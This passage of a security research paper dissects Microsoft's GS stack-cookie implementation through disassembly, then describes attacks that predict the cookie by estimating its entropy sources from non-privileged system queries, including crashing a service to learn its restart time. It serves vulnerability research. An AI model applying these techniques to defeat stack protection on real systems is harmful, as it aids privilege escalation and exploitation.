of Microsoft's current GS implementation will be given. Chapter 4 will
|
||||
describe some techniques that may be used to attack this implementation.
|
||||
Chapter 5 will provide experimental results from using the attacks that are
|
||||
described in chapter 4. Chapter 6 will discuss steps that could be taken to
|
||||
improve the current GS implementation. Finally, chapter 7 will discuss some
|
||||
areas where future work could be applied to further improve on the techniques
|
||||
described in this document.
|
||||
|
||||
3) Implementation
|
||||
|
||||
As was mentioned in the introduction, security solutions that are designed to
|
||||
protect against stack-based buffer overflows through the use of cookies tend
|
||||
to involve three distinct steps: cookie generation, prologue modifications,
|
||||
and epilogue modifications. Microsoft's GS implementation is no different.
|
||||
This chapter will describe each of these three steps independent of one
|
||||
another to paint a picture for how GS operates.
|
||||
|
||||
3.1) Cookie Generation
|
||||
|
||||
Microsoft chose to have the GS implementation generate an image file-specific
|
||||
cookie. This means that each image file (executable or DLL) will have its
|
||||
own unique cookie. When used in conjunction with a stack frame, a function
|
||||
will insert its image file-specific cookie into the stack frame. This will be
|
||||
covered in more detail in the next section. The actual approach taken to
|
||||
generate an image file's cookie lives in a compiler inserted routine called
|
||||
__security_init_cookie. This routine is placed prior to the call to the image
|
||||
file's actual entry point routine and therefore is one of the first things
|
||||
executed. By placing it at this point, all of the image file's code will be
|
||||
protected by the GS cookie.
|
||||
|
||||
The guts of the __security_init_cookie routine are actually the most critical part
|
||||
to understand. At a high-level, this routine will take an XOR'd combination
|
||||
of the current system time, process identifier, thread identifier, tick count,
|
||||
and performance counter. The end result of XOR'ing these values together is
|
||||
what ends up being the image file's security cookie. To understand how this
|
||||
actually works in more detail, consider the following disassembly from an
|
||||
application compiled with version 14.00.50727.42 of Microsoft's compiler.
|
||||
Going straight to the disassembly is the best way to concretely understand the
|
||||
implementation, especially if one is in search of weaknesses.
|
||||
|
||||
Like all functions, the __security_init_cookie function starts with a prologue.
|
||||
It allocates storage for some local variables and initializes some of them to
|
||||
zero. It also initializes some registers, specifically edi and ebx which will
|
||||
be used later on.
|
||||
|
||||
.text:00403D58 push ebp
|
||||
.text:00403D59 mov ebp, esp
|
||||
.text:00403D5B sub esp, 10h
|
||||
.text:00403D5E mov eax, __security_cookie
|
||||
.text:00403D63 and [ebp+SystemTimeAsFileTime.dwLowDateTime], 0
|
||||
.text:00403D67 and [ebp+SystemTimeAsFileTime.dwHighDateTime], 0
|
||||
.text:00403D6B push ebx
|
||||
.text:00403D6C push edi
|
||||
.text:00403D6D mov edi, 0BB40E64Eh
|
||||
.text:00403D72 cmp eax, edi
|
||||
.text:00403D74 mov ebx, 0FFFF0000h
|
||||
|
||||
At the end of the code above, a comparison between the current
|
||||
security cookie and a constant 0xbb40e64e is made. Before __security_init_cookie
|
||||
is called, the global __security_cookie is initialized to 0xbb40e64e. The
|
||||
constant comparison is used to see if the GS cookie has already been
|
||||
initialized. If the current cookie is equal to the constant, or the high
|
||||
order two bytes of the current cookie are zero, then a new cookie is
|
||||
generated. Otherwise, the complement of the current cookie is calculated and
|
||||
cookie generation is skipped.
|
||||
|
||||
.text:00403D79 jz short loc_403D88
|
||||
.text:00403D7B test eax, ebx
|
||||
.text:00403D7D jz short loc_403D88
|
||||
.text:00403D7F not eax
|
||||
.text:00403D81 mov __security_cookie_complement, eax
|
||||
.text:00403D86 jmp short loc_403DE8
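To make the branch logic above easier to follow, the two tests can be restated
in C. This is only a sketch of what the listing shows, not the CRT source. The
helper name gs_needs_new_cookie and the macro names are hypothetical; the
constants are the ones loaded into edi and ebx.

```c
#include <stdbool.h>
#include <stdint.h>

/* Value that __security_cookie holds before initialization (edi in the listing). */
#define GS_DEFAULT_COOKIE 0xBB40E64Eu
/* Mask loaded into ebx; it selects the two high order bytes of the cookie. */
#define GS_HIGH_WORD_MASK 0xFFFF0000u

/* Hypothetical helper: returns true when a new cookie would be generated. */
static bool gs_needs_new_cookie(uint32_t current)
{
    if (current == GS_DEFAULT_COOKIE)        /* cmp eax, edi / jz  */
        return true;
    if ((current & GS_HIGH_WORD_MASK) == 0)  /* test eax, ebx / jz */
        return true;
    return false;  /* existing cookie is kept and only its complement is stored */
}
```

A return value of false corresponds to the path that stores the complement of
the existing cookie and jumps past cookie generation.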
|
||||
|
||||
To generate a new cookie, the function starts by querying the current system
|
||||
time using GetSystemTimeAsFileTime. The system time as represented by Windows
|
||||
is a 64-bit integer that measures the system time down to a granularity of 100
|
||||
nanoseconds. The high order 32-bit integer and the low order 32-bit integer
|
||||
are XOR'd together to produce the first component of the cookie. Following
|
||||
that, the current process identifier is queried using GetCurrentProcessId and
|
||||
then XOR'd as the second component of the cookie. The current thread
|
||||
identifier is then queried using GetCurrentThreadId and then XOR'd as the
|
||||
third component of the cookie. The current tick count is queried using
|
||||
GetTickCount and then XOR'd as the fourth component of the cookie. Finally,
|
||||
the current performance counter value is queried using
|
||||
QueryPerformanceCounter. Like system time, this value is also a 64-bit
|
||||
integer, and its high order 32-bit integer and low order 32-bit integer are
|
||||
XOR'd as the fifth component of the cookie. Once these XOR operations have
|
||||
completed, a comparison is made between the newly generated cookie value and
|
||||
the constant 0xbb40e64e. If the new cookie is not equal to the constant
|
||||
value, then a second check is made to make sure that the high order two bytes
|
||||
of the cookie are non-zero. If they are zero, then a 16 bit left shift of the
|
||||
cookie is performed in order to seed the high order bytes.
|
||||
|
||||
.text:00403D89 lea eax, [ebp+SystemTimeAsFileTime]
|
||||
.text:00403D8C push eax
|
||||
.text:00403D8D call ds:__imp__GetSystemTimeAsFileTime@4
|
||||
.text:00403D93 mov esi, [ebp+SystemTimeAsFileTime.dwHighDateTime]
|
||||
.text:00403D96 xor esi, [ebp+SystemTimeAsFileTime.dwLowDateTime]
|
||||
.text:00403D99 call ds:__imp__GetCurrentProcessId@0
|
||||
.text:00403D9F xor esi, eax
|
||||
.text:00403DA1 call ds:__imp__GetCurrentThreadId@0
|
||||
.text:00403DA7 xor esi, eax
|
||||
.text:00403DA9 call ds:__imp__GetTickCount@0
|
||||
.text:00403DAF xor esi, eax
|
||||
.text:00403DB1 lea eax, [ebp+PerformanceCount]
|
||||
.text:00403DB4 push eax
|
||||
.text:00403DB5 call ds:__imp__QueryPerformanceCounter@4
|
||||
.text:00403DBB mov eax, dword ptr [ebp+PerformanceCount+4]
|
||||
.text:00403DBE xor eax, dword ptr [ebp+PerformanceCount]
|
||||
.text:00403DC1 xor esi, eax
|
||||
.text:00403DC3 cmp esi, edi
|
||||
.text:00403DC5 jnz short loc_403DCE
|
||||
...
|
||||
.text:00403DCE loc_403DCE:
|
||||
.text:00403DCE test esi, ebx
|
||||
.text:00403DD0 jnz short loc_403DD9
|
||||
.text:00403DD2 mov eax, esi
|
||||
.text:00403DD4 shl eax, 10h
|
||||
.text:00403DD7 or esi, eax
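The fix-up at loc_403DCE can be modeled in C as follows. Note that shl eax, 10h
shifts by 0x10, which is 16 bits. The helper name is hypothetical, and the
sketch deliberately does not model the branch hidden behind the elided lines
in the listing, since the listing does not show what it does.

```c
#include <stdint.h>

/* Hypothetical helper modeling loc_403DCE: seed empty high order bytes. */
static uint32_t gs_seed_high_word(uint32_t cookie)
{
    if ((cookie & 0xFFFF0000u) == 0) {  /* test esi, ebx */
        cookie |= cookie << 16;         /* shl eax, 10h / or esi, eax */
    }
    return cookie;
}
```

When the high order bytes are already non-zero the cookie passes through
unchanged, which is the common case.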
|
||||
|
||||
Finally, when a valid cookie is generated, it's stored in the image file's
|
||||
__security_cookie. The bit-wise complement of the cookie is also stored in
|
||||
__security_cookie_complement. The reason for the existence of the complement will
|
||||
be described later.
|
||||
|
||||
.text:00403DD9 mov __security_cookie, esi
|
||||
.text:00403DDF not esi
|
||||
.text:00403DE1 mov __security_cookie_complement, esi
|
||||
.text:00403DE7 pop esi
|
||||
.text:00403DE8 pop edi
|
||||
.text:00403DE9 pop ebx
|
||||
.text:00403DEA leave
|
||||
.text:00403DEB retn
|
||||
|
||||
In simpler terms, the meat of the cookie generation can basically be
|
||||
summarized through the following pseudo code:
|
||||
|
||||
Cookie = SystemTimeHigh
|
||||
Cookie ^= SystemTimeLow
|
||||
Cookie ^= ProcessId
|
||||
Cookie ^= ThreadId
|
||||
Cookie ^= TickCount
|
||||
Cookie ^= PerformanceCounterHigh
|
||||
Cookie ^= PerformanceCounterLow
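For readers who prefer C to pseudo code, the same combination might look like
the sketch below. The struct gs_sources and both function names are
hypothetical containers for the values that the real routine obtains from the
Windows APIs named earlier; nothing here calls those APIs, so the sketch only
illustrates the arithmetic.

```c
#include <stdint.h>

/* Hypothetical container for the values sampled during cookie generation. */
struct gs_sources {
    uint64_t system_time;   /* 64-bit system time, 100 ns units */
    uint32_t process_id;
    uint32_t thread_id;
    uint32_t tick_count;    /* milliseconds since boot */
    uint64_t perf_counter;  /* 64-bit performance counter value */
};

/* XOR the high and low 32-bit halves of a 64-bit value together. */
static uint32_t gs_fold64(uint64_t v)
{
    return (uint32_t)(v >> 32) ^ (uint32_t)v;
}

/* Combine all sources in the same order as the pseudo code. */
static uint32_t gs_combine(const struct gs_sources *s)
{
    uint32_t cookie = gs_fold64(s->system_time);
    cookie ^= s->process_id;
    cookie ^= s->thread_id;
    cookie ^= s->tick_count;
    cookie ^= gs_fold64(s->perf_counter);
    return cookie;
}
```

Because every step is an XOR, the order of the sources does not affect the
result.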
|
||||
|
||||
3.2) Prologue Modifications
|
||||
|
||||
In order to make use of the generated cookie, functions must be modified to
|
||||
insert it into the stack frame at the time that they are called. This does
|
||||
add some overhead to the call time associated with a function, but its overall
|
||||
effect is a fixed cost for each invocation. The actual
|
||||
modifications that are made to a function's prologue typically involve just
|
||||
three instructions. The cookie that was generated for the image file is XOR'd
|
||||
with the current value of the frame pointer. This value is then placed in the
|
||||
current stack frame at a precisely chosen location by the compiler.
|
||||
|
||||
.text:0040214B mov eax, __security_cookie
|
||||
.text:00402150 xor eax, ebp
|
||||
.text:00402152 mov [ebp+2A8h+var_4], eax
|
||||
|
||||
It should be noted that Microsoft has taken great care to refine the way a
|
||||
stack frame is laid out in the presence of GS. Locally defined pointers,
|
||||
including function pointers, are placed before statically sized buffers in the
|
||||
stack frame. Additionally, dangerous input parameters passed to the function,
|
||||
such as pointers or structures that contain pointers, will have local copies
|
||||
made that are positioned before statically sized local buffers. The local
|
||||
copies of these parameters are used instead of those originally passed to the
|
||||
function. These two changes go a long way toward helping to prevent other
|
||||
scenarios in which stack-based buffer overflows might be exploited.
|
||||
|
||||
3.3) Epilogue Modifications
|
||||
|
||||
When a function returns, it must check to make sure that the cookie that was
|
||||
stored on the stack has not been tampered with. To accomplish this, the
|
||||
compiler inserts the following instructions into a function's epilogue:
|
||||
|
||||
.text:00402223 mov ecx, [ebp+2A8h+var_4]
|
||||
.text:00402229 xor ecx, ebp
|
||||
.text:0040222B pop esi
|
||||
.text:0040222C call __security_check_cookie
|
||||
|
||||
The value of the cookie that was stored on the stack is moved into ecx and
|
||||
then XOR'd with the current frame pointer to get it back to the expected
|
||||
value. Following that, a call is made to __security_check_cookie where the stack
|
||||
frame's cookie value is passed in the ecx register. The __security_check_cookie
|
||||
routine is very short and sweet. The passed in cookie value is compared with
|
||||
the image file's global cookie. If they don't match, __report_gsfailure is
|
||||
called and the process eventually terminates. This is what one would expect
|
||||
in the case of a buffer overflow scenario. However, if they do match, the
|
||||
routine simply returns, allowing the calling function to proceed with
|
||||
execution and cleanup.
|
||||
|
||||
.text:0040634B cmp ecx, __security_cookie
|
||||
.text:00406351 jnz short loc_406355
|
||||
.text:00406353 rep retn
|
||||
.text:00406355 loc_406355:
|
||||
.text:00406355 jmp __report_gsfailure
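Taken together, the prologue and epilogue changes amount to a pair of XOR
operations around a comparison. The sketch below models that with plain
integers. The function names are hypothetical, and frame_pointer simply stands
in for the value of ebp; no real stack frame is inspected.

```c
#include <stdbool.h>
#include <stdint.h>

/* Prologue: the value written into the frame's cookie slot. */
static uint32_t gs_frame_cookie(uint32_t image_cookie, uint32_t frame_pointer)
{
    return image_cookie ^ frame_pointer;  /* mov eax, cookie / xor eax, ebp */
}

/* Epilogue and check routine: undo the XOR, then compare with the global. */
static bool gs_frame_check(uint32_t stored, uint32_t frame_pointer,
                           uint32_t image_cookie)
{
    uint32_t recovered = stored ^ frame_pointer;  /* xor ecx, ebp */
    return recovered == image_cookie;             /* cmp ecx, cookie */
}
```

Because the slot holds the cookie XOR'd with ebp, the value found on the stack
differs from frame to frame even though the image file's cookie is constant.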
|
||||
|
||||
4) Attacking GS
|
||||
|
||||
At the time of this writing, all publicly disclosed attacks against GS that
|
||||
the author is aware of have relied on getting control of execution before the
|
||||
cookie is checked or by finding some way to leak the value of the cookie back
|
||||
to the attacker. Both of these styles of attack are of great interest and
|
||||
value, but the focus of this paper will be on a different method of attacking
|
||||
GS. Specifically, this chapter will outline techniques that may be used to
|
||||
make it easier to guess the value of an image file's GS cookie. Two techniques
|
||||
will be described. The first technique will describe methods for calculating
|
||||
the values that were used as entropy sources when the cookie was generated.
|
||||
These calculations are possible in situations where an attacker has local
|
||||
access to the machine, such as through the console or through terminal
|
||||
services. The second technique describes the general concept of predictable
|
||||
ranges of some values that are used in the context of boot start services,
|
||||
such as lsass.exe. This predictability may make the guessing of a GS cookie
|
||||
more feasible in both local and remote scenarios.
|
||||
|
||||
4.1) Calculating Entropy Sources
|
||||
|
||||
The sources used to generate the GS cookie for a given image file are constant
|
||||
and well-known. They include the current system time, process identifier,
|
||||
thread identifier, tick count, and performance counter. In light of that
|
||||
fact, it only makes sense to investigate the amount of effective entropy each
|
||||
source adds to the cookie. Since it's a requirement that the cookie produced
|
||||
be secret, the ability to guess a value used in the generation of the cookie
|
||||
will allow it to be canceled out of the equation. This is true due to the
|
||||
simple fact that each of the values used to generate the cookie is XOR'd with
|
||||
each other value (XOR is commutative and self-inverse). The ability to guess
|
||||
multiple values can make it possible to seriously impact the overall integrity
|
||||
of the cookie.
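The cancellation property is easy to demonstrate. In the hedged sketch below,
gs_cancel_known is a hypothetical helper that XORs a list of known source
values out of a cookie; whatever is left is the XOR of the sources that remain
unknown. The values used to exercise it would be made up for illustration and
are not measurements.

```c
#include <stdint.h>

/* XOR every known source value out of the cookie. Since x ^ x == 0, each
 * known value removes its own contribution and leaves the rest intact. */
static uint32_t gs_cancel_known(uint32_t cookie, const uint32_t *known,
                                unsigned count)
{
    for (unsigned i = 0; i < count; i++) {
        cookie ^= known[i];
    }
    return cookie;
}
```

Read the other way around, an attacker who XORs together correct estimates of
the known sources is off from the real cookie by exactly the unknown residue.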
|
||||
|
||||
While the sources used in the generation of the cookie have long been regarded
|
||||
as satisfactory, the author has found that the majority of the sources
|
||||
actually contribute little to no value toward the overall entropy of the
|
||||
cookie. However, this is currently only true if an attacker has local access
|
||||
to the machine. Being able to know a GS cookie that was used in a privileged
|
||||
process would make it possible to exploit a local privilege escalation
|
||||
vulnerability, for example. There may be some circumstances where the
|
||||
techniques described in this section could be applied remotely, but for the
|
||||
purpose of this document, only the local scenario will be considered. The
|
||||
following subsections will outline methods that can be used to calculate or
|
||||
deterministically find the specific values that were used when a cookie was
|
||||
being generated in a particular process context. As a result of this
|
||||
analysis, it's become clear that the only particular variable source of true
|
||||
entropy for the GS cookie is the low 17 bits of the performance counter. All
|
||||
other sources can be reliably calculated, with some margin of error.
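To put the 17 bit figure in perspective, the sketch below enumerates the
candidate cookies that remain under two assumptions that may not always hold:
that every other source has been estimated exactly, and that the estimation
error really is confined to the low 17 bits. The macro and function names are
hypothetical.

```c
#include <stdint.h>

#define GS_UNKNOWN_BITS 17u
#define GS_CANDIDATES   (1u << GS_UNKNOWN_BITS)  /* 131072 possible values */

/* Return the index-th candidate: keep the estimated high 15 bits and
 * substitute index for the unknown low 17 bits. */
static uint32_t gs_candidate(uint32_t estimate, uint32_t index)
{
    uint32_t mask = GS_CANDIDATES - 1u;  /* 0x0001FFFF */
    return (estimate & ~mask) | (index & mask);
}
```

Iterating index from 0 to GS_CANDIDATES - 1 visits each remaining possibility
once, compared with 2^32 possibilities for a fully unknown 32-bit cookie.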
|
||||
|
||||
For the following subsections, a modified executable named vulnapp.exe was
|
||||
used to extract the information that was used at the time that a process
|
||||
executable's GS cookie was generated. In particular, __security_init_cookie was
|
||||
modified to jump into a function that saves the information used to generate
|
||||
the cookie. The implementation of this function is shown below for those who
|
||||
are curious:
|
||||
|
||||
//
|
||||
// The FramePointer is the value of EBP in the context of the
|
||||
// __security_init_cookie routine. The cookie is the actual,
|
||||
// resultant cookie value. GSContext is a global array.
|
||||
//
|
||||
VOID DumpInformation(
|
||||
PULONG FramePointer,
|
||||
ULONG Cookie)
|
||||
{
|
||||
GSContext[0] = FramePointer[-3];
|
||||
GSContext[1] = FramePointer[-4];
|
||||
GSContext[2] = FramePointer[-1];
|
||||
GSContext[3] = FramePointer[-2];
|
||||
GSContext[4] = GetCurrentProcessId();
|
||||
GSContext[5] = GetCurrentThreadId();
|
||||
GSContext[6] = GetTickCount();
|
||||
GSContext[7] = Cookie;
|
||||
}
|
||||
|
||||
4.1.1) System Time
|
||||
|
||||
System time is a value that one might regard as challenging to recover. After
|
||||
all, it seems impossible to get the 100 nanosecond granularity of the system
|
||||
time that was retrieved when a cookie was being generated. Quite the
|
||||
contrary, actually. There are a few key points that go into being able to
|
||||
recover the system time. First, it's a fact that even though the system time
|
||||
measures granularity in terms of 100 nanosecond intervals, it's really only
|
||||
updated every 15.625 milliseconds (or 10.1 milliseconds for more modern CPUs).
|
||||
To many, 15.625 may seem like an odd number, but for those familiar with the
|
||||
Windows thread scheduler, it can be recognized as the period of the timer
|
||||
interrupt. For that reason, the current system time is only updated as a
|
||||
result of the timer interrupt firing. This fact means that the alignment of
|
||||
the system time that is used when a cookie is generated is known.
|
||||
|
||||
Of more interest, though, is the relationship between the system time value
|
||||
and the creation time value associated with a process or its initial thread.
|
||||
Since the minimum granularity of the system time is 15.6 or 10.1 milliseconds,
|
||||
it follows that the granularity of the thread creation time will be the same.
|
||||
In terms of modern CPUs, 15.6 milliseconds is an eternity and is plenty long
|
||||
for the processor to execute all instructions from the creation of the thread
|
||||
to the generation of the security cookie. This fact means that it's
|
||||
possible to assume that the creation time of a process or thread is the
|
||||
same as the system time that was used when the cookie was generated. This
|
||||
assumption doesn't always work, though, and there are indeed cases where
|
||||
the creation time will not equal the system time that was used. These
|
||||
situations are usually a result of the thread that creates the cookie not
|
||||
being immediately scheduled.
|
||||
|
||||
Even so, an attacker must still be able to obtain the
|
||||
creation time of an arbitrary process or thread. On the surface, this would
|
||||
seem impossible because task manager prevents a non-privileged user from
|
||||
getting the start time of a privileged process.
|
||||
|
||||
This is all a deception, though, because there does exist functionality that
|
||||
is exposed to non-privileged users that can be used to get this information.
|
||||
One way of getting it is through the use of the native API routine
|
||||
NtQuerySystemInformation. In this case, the
|
||||
SystemProcessesAndThreadsInformation system information class is used to query
|
||||
information about all of the running processes on the system. This
|
||||
information includes the process name, process creation time, and the creation
|
||||
time for each thread in each process. While this information class has been
|
||||
removed in Windows Vista, there are still potential ways of obtaining the
|
||||
creation time information. For example, an attacker could simply crash the
|
||||
vulnerable service once (assuming it's not a critical service) and then wait
|
||||
for it to respawn. Once it respawns, the creation time can be inferred based
|
||||
on the restart delay of the service. Granted, service restarts are limited
|
||||
to three times per day in Vista, but crashing it once should cause no major
|
||||
issues.
|
||||
|
||||
Using NtQuerySystemInformation, it's possible to collect some data that can be
|
||||
used to determine the likelihood that the creation time of a thread will be
|
||||
equal to the system time that was used when a GS cookie was generated. To
|
||||
test this, the author used the modified vulnapp.exe executable to extract the
|
||||
system time at the time that the cookie was generated. Following that, a
|
||||
separate program was used to collect the creation time information of the
|
||||
process in question using the native API. The initial thread's creation time
|
||||
was then compared with the system time to see if they were equal. The
|
||||
creation time and system time were often equal in a sample of 742 cookies.
|
||||
|
||||
Obviously, the data set describing differences is only relevant to a
|
||||
particular system load. If there are many threads waiting to run during the
|
||||
time that a process is executed, then it is unlikely that the system time will
|
||||
equal the process creation time. In a desktop environment, it's probably safe
|
||||
to assume that the thread will run immediately, but more conclusive evidence
|
||||
may be necessary.
|
||||
|
||||
Given these facts, it is apparent that the complete 64-bit system time value
|
||||
can be recovered more often than not with a great degree of accuracy just by
|
||||
simply assuming that thread creation time is the same as the system time
|
||||
value.
|
||||
|
||||
4.1.2) Process and Thread Identifier
|
||||
|
||||
The process and thread identifier are arguably the worst sources of entropy
|
||||
for the GS cookie, at least in the context of a local attack. The two high
|
||||
order bytes of the process and thread identifiers are almost always zero.
|
||||
This means they have absolutely no effect on the high order entropy.
|
||||
Additionally, the process and thread identifier can be determined with 100
|
||||
percent accuracy in a local context using the same API described in the
|
||||
previous section on getting the system time. This involves making use of
|
||||
the NtQuerySystemInformation native API with the
|
||||
SystemProcessesAndThreadsInformation system information class to get the
|
||||
process identifier and thread identifier associated with a given process
|
||||
executable.
|
||||
|
||||
The end result, obviously, is that the process and thread identifier can be
|
||||
determined with great accuracy. The one exception to this rule would be
|
||||
Windows Vista, but, as was mentioned before, alternative methods of obtaining
|
||||
the process and thread identifier may exist.
|
||||
|
||||
4.1.3) Tick Count
|
||||
|
||||
The tick count is, for all intents and purposes, simply another measure of
|
||||
time. When the GetTickCount API routine is called, the number of ticks is
|
||||
multiplied by the tick count multiplier. This multiplication effectively
|
||||
translates the number of ticks to the number of milliseconds that the system
|
||||
has been up. If one can safely assume that the system time used to
|
||||
generate the cookie was the same as the thread creation time, then the tick
|
||||
count at the time that the cookie was generated can simply be calculated using
|
||||
the thread creation time. The creation time isn't enough, though. Since the
|
||||
GetTickCount value measures the number of milliseconds that have occurred
|
||||
since boot, the actual uptime of the system has to be determined.
|
||||
|
||||
To determine the system uptime, a non-privileged user can again make use of
|
||||
the NtQuerySystemInformation native API, this time with the
|
||||
SystemTimeOfDayInformation system information class. This query returns the
|
||||
time that the system was booted as a 64-bit integer measured in 100 nanosecond
|
||||
intervals, just like the thread creation time. To calculate the system uptime
|
||||
in milliseconds, it's as simple as subtracting the boot time from the creation
|
||||
time and then dividing by 10000 to convert from 100 nanosecond intervals to 1
|
||||
millisecond intervals:
|
||||
|
||||
EstTickCount = (CreationTime - BootTime) / 10000
|
||||
|
||||
Some experimentation shows that this calculation is pretty accurate, but some
|
||||
quantity is lost in translation. From what the author has observed, a
|
||||
constant offset of 0x4e, or 78 milliseconds, needs to be added to the
|
||||
result of this calculation. The source of this constant is as of yet unknown,
|
||||
but it appears to be a required constant. This results in the actual equation
|
||||
being:
|
||||
|
||||
EstTickCount = [(CreationTime - BootTime) / 10000] + 78
|
||||
|
||||
The end result is that the tick count can be calculated with a great degree of
|
||||
accuracy. If the system time calculation is off, then that will directly
|
||||
affect the calculation of the tick count.
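The tick count estimate translates directly into C. This is a sketch under the
assumptions stated above: both inputs are 64-bit times in 100 nanosecond
units, and the 78 millisecond constant is the empirical value reported here,
which may differ on other systems. The function and macro names are
hypothetical.

```c
#include <stdint.h>

#define GS_100NS_PER_MS   10000u
#define GS_TICK_OFFSET_MS 78u  /* 0x4e, empirical constant from the text */

/* Estimate the GetTickCount value at the moment the thread was created. */
static uint32_t gs_est_tick_count(uint64_t creation_time, uint64_t boot_time)
{
    uint64_t uptime_ms = (creation_time - boot_time) / GS_100NS_PER_MS;
    /* GetTickCount returns a 32-bit value, so the estimate is truncated. */
    return (uint32_t)(uptime_ms + GS_TICK_OFFSET_MS);
}
```

For example, a thread created exactly one hour after boot yields an estimate
of 3600000 + 78 milliseconds.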
|
||||
|
||||
4.1.4) Performance Counter
|
||||
|
||||
Of all the entropy sources described here, the performance counter is the
|
||||
only one that really presents a challenge. The purpose of the performance
|
||||
counter is to describe the total number of cycles that have executed. On the
|
||||
outside, the performance counter would seem impossible to reliably determine.
|
||||
After all, how could one possibly determine the precise number of cycles that
|
||||
had occurred as a cookie was being generated? The answer, of course, comes
|
||||
down to the fact that the performance counter itself is, for all intents and
|
||||
purposes, just another measure of time. Windows provides two interesting
|
||||
user-mode APIs that deal with the performance counter. The first,
|
||||
QueryPerformanceCounter, is used to ask the kernel to read the current value
|
||||
of the performance counter[8]. The result of this query is stored in the 64-bit
|
||||
output parameter that the caller provides. The second API is
|
||||
QueryPerformanceFrequency. This routine is interesting because it returns a
|
||||
value that describes the amount that the performance counter will change in
|
||||
one second[7]. Documentation indicates that the frequency cannot change while
|
||||
the system is booted.
|
||||
|
||||
Using the existing knowledge about the uptime of the system and the
|
||||
calculation that can be performed to convert between the performance counter
|
||||
value and seconds, it is possible to fairly accurately guess what the
|
||||
performance counter was at the time that the cookie was generated. Granted,
|
||||
this method is more fuzzy than the previously described methods, as
|
||||
experimental results have shown a large degree of fluctuation in the lower 17
|
||||
bits. Those results will be discussed in more detail in chapter 5. The actual
|
||||
equation that can be used to generate the estimated performance counter is to
|
||||
take the uptime, as measured in 100 nanosecond intervals, and multiply it by
|
||||
the performance frequency divided by 10000000, which converts the frequency
|
||||
from a measure of 1 second to 100 nanosecond intervals:
|
||||
|
||||
EstPerfCounter = UpTime x (PerfFreq / 10000000)
|
||||
|
||||
In a fashion similar to tick count, a constant scaling factor of -165000 was
|
||||
determined through experimentation. This seems to produce more accurate
|
||||
results in some of the 24 low bits. Based on this calculation, it's possible
|
||||
to accurately determine the entire 32-bit high order integer and the upper 15
|
||||
bits of the 32-bit low order integer. Of course, if the system time estimate
|
||||
is wrong, then that directly affects this calculation.
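
A minimal sketch of the performance counter estimate is shown below. The
names est_perf_counter and split_high_low are hypothetical, and the sketch
assumes that the -165000 constant is added to the estimate in the same way
that the 78 millisecond constant is added to the tick count. Note that the
multiplication is performed before the division; with integer arithmetic,
evaluating PerfFreq / 10000000 first would truncate to zero for a frequency
such as 3579545.

```python
# Sketch of the performance counter estimate using integer arithmetic.
INTERVALS_PER_SECOND = 10_000_000  # 100 ns intervals in one second
OBSERVED_ADJUSTMENT = -165_000     # empirical constant from the text


def est_perf_counter(uptime_100ns, perf_freq, adjustment=OBSERVED_ADJUSTMENT):
    """Estimate the 64-bit performance counter for a given uptime."""
    # Multiply first so the fractional part of PerfFreq / 10000000 is kept.
    estimate = uptime_100ns * perf_freq // INTERVALS_PER_SECOND
    # Assumption: the constant is applied additively, then wrapped to 64 bits.
    return (estimate + adjustment) & 0xFFFFFFFFFFFFFFFF


def split_high_low(value64):
    """Split a 64-bit value into its (high, low) 32-bit halves."""
    return (value64 >> 32) & 0xFFFFFFFF, value64 & 0xFFFFFFFF
```

The high and low halves are split out because they are the quantities whose
predictability is discussed separately in the text.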
|
||||
|
||||
4.1.5) Frame Pointer
|
||||
|
||||
While the frame pointer does not influence an image file's global cookie, it
|
||||
does influence a stack frame's version of the cookie. For that reason, the
|
||||
frame pointer must be considered as an overall contributor to the effective
|
||||
entropy of the cookie. With the exception of Windows Vista, the frame pointer
|
||||
should be a deterministic value that could be deduced at the time that a
|
||||
vulnerability is triggered. As such, the frame pointer should be considered a
|
||||
known value for the majority of stack-based buffer overflows. Granted, in
|
||||
multi-threaded applications, it may be more challenging to accurately guess
|
||||
the value of the frame pointer.
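
To illustrate why a known frame pointer contributes no effective entropy,
consider the following sketch. It assumes that a stack frame's version of
the cookie is formed by XORing the global cookie with the frame pointer;
the function names are hypothetical. Because XOR is its own inverse, anyone
who knows the frame pointer can convert between the two values freely.

```python
MASK32 = 0xFFFFFFFF


def frame_cookie(global_cookie, frame_pointer):
    """Value stored in the stack frame, assuming cookie XOR frame pointer."""
    return (global_cookie ^ frame_pointer) & MASK32


def recover_global_cookie(frame_value, frame_pointer):
    """Undo the XOR when the frame pointer is known."""
    return (frame_value ^ frame_pointer) & MASK32
```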
|
||||
|
||||
In the Windows Vista environment, the compile-time GS implementation gets a
|
||||
boost in security due to the introduction of ASLR. This helps to ensure that
|
||||
the frame pointer is actually an unknown quantity. However, it doesn't
|
||||
introduce equal entropy in all bits. In particular, octet 4, and potentially
|
||||
octet 3, may have predictable values due to the way that the randomization is
|
||||
applied to dynamic memory allocations. In order to prevent fragmentation of
|
||||
the address space, Vista's ASLR implementation attempts to ensure that stack
|
||||
regions are still allocated low in the address space. This has the side
|
||||
effect of ensuring that a non-trivial number of bits in the frame pointer will
|
||||
be predictable. Additionally, while Vista's ASLR implementation makes an
|
||||
effort to shift the lower bits of the stack pointer, there may still be some
|
||||
bits that are always predictable in octet 2.
|
||||
|
||||
4.2) Predictability of Entropy Sources in Boot Start Services
|
||||
|
||||
A second attack that could be used against GS involves attacking services that
|
||||
start early on when the system is booted. These services may experience more
|
||||
predictable states of entropy due to the fact that the amount of time it takes
|
||||
to boot up and the order in which tasks are performed is fairly, though not
|
||||
entirely, consistent. This insight may make it possible to estimate the value
|
||||
of entropy sources remotely.
|
||||
|
||||
To better understand this type of attack, the author collected 742 samples
|
||||
that were taken from a custom service that was set to automatically start
|
||||
during boot on a Windows XP SP2 installation. This service was simply
|
||||
designed to log the state used at the time that the GS cookie was being
|
||||
generated. While a sampling of the GS cookie state applied to lsass.exe would
|
||||
have been more ideal, it wasn't worth the headache of having to patch a
|
||||
critical system service. Perhaps the reader may find it interesting to
|
||||
collect this data on their own. From the samples that were taken, the
|
||||
following diagrams show the likelihood of each individual bit being set for
|
||||
each of the different entropy sources.
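
The per-bit likelihood referred to above can be computed from a set of
samples along the following lines. This is a sketch only; the function name
bit_set_frequency is hypothetical and the samples are assumed to be plain
integers logged by the sampling service.

```python
def bit_set_frequency(samples, width=32):
    """Return the fraction of samples with each bit set, bit 0 first."""
    if not samples:
        raise ValueError("at least one sample is required")
    counts = [0] * width
    for value in samples:
        for bit in range(width):
            counts[bit] += (value >> bit) & 1
    return [count / len(samples) for count in counts]
```

A bit whose frequency is close to 0.0 or 1.0 is highly predictable, while a
bit whose frequency is close to 0.5 shows no obvious bias.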
|
||||
|
||||
Overall, there are a number of predictable bits in things like the high
|
||||
32-bits of both the system time and the performance counter, the process
|
||||
